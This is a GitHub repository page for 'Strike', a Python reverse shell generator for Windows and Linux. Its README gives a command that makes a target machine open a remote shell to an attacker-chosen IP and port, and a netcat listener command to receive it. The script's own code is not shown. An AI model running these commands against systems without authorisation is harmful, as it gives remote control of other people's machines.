Skip to content
/ Strike Public

An automated reverse shell generator. Only use for educational purposes

License

Notifications You must be signed in to change notification settings

0smic/Strike

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

34 Commits
 
 
 
 
 
 

Repository files navigation

Reverse Shell Generator

A Python script for creating a reverse shell on target systems, supporting both Windows and Linux platforms. Use responsibly and with proper authorization.

Getting Started

These instructions will help you get a copy of the project up and running on your local machine.

Prerequisites

To run this script, you will need:

  • Python 3.x
  • A target machine to run the reverse shell on

Installation

  1. Clone the repository:

    git clone https://github.com/0smic/Strike/
  2. Change into the project directory:

    cd 0smic
    

Usage

To create a reverse shell, you can use this script as follows:

  1. For Windows:

    python reverse_shell.py -ip RECEIVER_IP -port PORT_NUMBER
  2. For Linux:

    python reverse_shell.py -ip RECEIVER_IP -port PORT_NUMBER
    

How to Run the Code

To run the code, follow the usage instructions provided in the "Usage" section above.

  • Make sure you have the required dependencies installed.
  • Replace RECEIVER_IP with the IP address of the machine you want to receive shell.
  • Replace PORT_NUMBER with the port number to connect to on the machine you wan to receive shell.
  • The script will create a reverse shell connection to the specified IP and port.

IMPORTANT

You want to start listening to the specific port using 'Netcat' in another device inorder to receive the reverse shell from the target

  • listen through Netcat
    nc -nvlp PORT_NUMBER

About

An automated reverse shell generator. Only use for educational purposes

Topics

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Languages